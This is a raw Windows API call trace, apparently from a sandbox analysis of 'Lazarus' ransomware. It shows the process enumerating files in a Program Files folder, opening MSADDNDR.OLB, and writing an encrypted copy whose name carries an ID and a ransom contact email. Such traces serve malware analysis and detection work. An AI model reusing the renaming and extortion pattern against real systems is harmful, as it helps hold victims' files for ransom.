[0088.040] AreFileApisANSI () returned 1 [0088.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\DESIGNER", lpUsedDefaultChar=0x0) returned 39 [0088.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0088.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0088.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0088.041] AreFileApisANSI () returned 1 [0088.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0088.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d210 [0088.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d210, cchWideChar=39 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER") returned 39 [0088.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER" (normalized: "c:\\program files\\common files\\designer"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.041] GetLastError () returned 0x5 [0088.041] GetLastError () returned 0x5 [0088.041] SetLastError (dwErrCode=0x5) [0088.041] GetLastError () returned 0x5 [0088.041] SetLastError (dwErrCode=0x5) [0088.041] GetLastError () returned 0x5 [0088.041] SetLastError (dwErrCode=0x5) [0088.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0088.041] AreFileApisANSI () returned 1 [0088.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0088.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d688 [0088.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=39 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER") returned 39 [0088.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER" (normalized: "c:\\program files\\common files\\designer"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.042] GetLastError () returned 0x5 [0088.042] GetLastError () returned 0x5 [0088.042] SetLastError (dwErrCode=0x5) [0088.042] GetLastError () returned 0x5 [0088.042] SetLastError (dwErrCode=0x5) [0088.042] GetLastError () returned 0x5 [0088.042] SetLastError (dwErrCode=0x5) [0088.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0088.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0088.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0088.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0088.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0088.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0088.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0088.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0088.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0088.042] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728da660, ftCreationTime.dwHighDateTime=0x1d5895c, ftLastAccessTime.dwLowDateTime=0x9caef5e0, ftLastAccessTime.dwHighDateTime=0x1d5ce38, ftLastWriteTime.dwLowDateTime=0x9caef5e0, ftLastWriteTime.dwHighDateTime=0x1d5ce38, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="far.exe", cAlternateFileName="")) returned 1 [0088.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0088.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0088.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0088.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0088.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0088.042] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78510 [0088.043] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4aab75fe, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0xa0417b85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4aadd873, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.043] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8c3a00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aadd873, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5c8c3a00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3e70, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.OLB", cAlternateFileName="")) returned 1 [0088.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0088.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0088.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0088.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0088.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a5b0 [0088.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0088.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0088.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0088.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0088.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.044] AreFileApisANSI () returned 1 [0088.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB", lpUsedDefaultChar=0x0) returned 52 [0088.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0088.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0088.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0088.044] AreFileApisANSI () returned 1 [0088.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0088.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0088.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 52 [0088.044] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.044] GetFileType (hFile=0x348) returned 0x1 [0088.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0088.045] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0088.045] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0088.045] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0088.045] CloseHandle (hObject=0x348) returned 1 [0088.045] AreFileApisANSI () returned 1 [0088.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0088.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0088.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x46128, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 52 [0088.045] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.045] GetFileType (hFile=0x348) returned 0x1 [0088.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0088.046] CloseHandle (hObject=0x348) returned 1 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.047] AreFileApisANSI () returned 1 [0088.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0088.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0088.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 52 [0088.047] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8c3a00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aadd873, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5c8c3a00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3e70)) returned 1 [0088.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0088.047] AreFileApisANSI () returned 1 [0088.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0088.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0088.048] GetLastError () returned 0x0 [0088.048] SetLastError (dwErrCode=0x0) [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e420 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x944a8 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0088.048] GetLastError () returned 0x0 [0088.048] SetLastError (dwErrCode=0x0) [0088.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71bd0 [0088.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a790 [0088.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0088.048] AreFileApisANSI () returned 1 [0088.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 114 [0088.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe4) returned 0x4ebc8 [0088.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a790, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=114 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 114 [0088.049] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.050] GetFileType (hFile=0x348) returned 0x1 [0088.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0088.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0088.050] AreFileApisANSI () returned 1 [0088.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0088.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0088.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 52 [0088.050] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0088.050] GetFileType (hFile=0x35c) returned 0x1 [0088.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0088.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0088.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0088.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 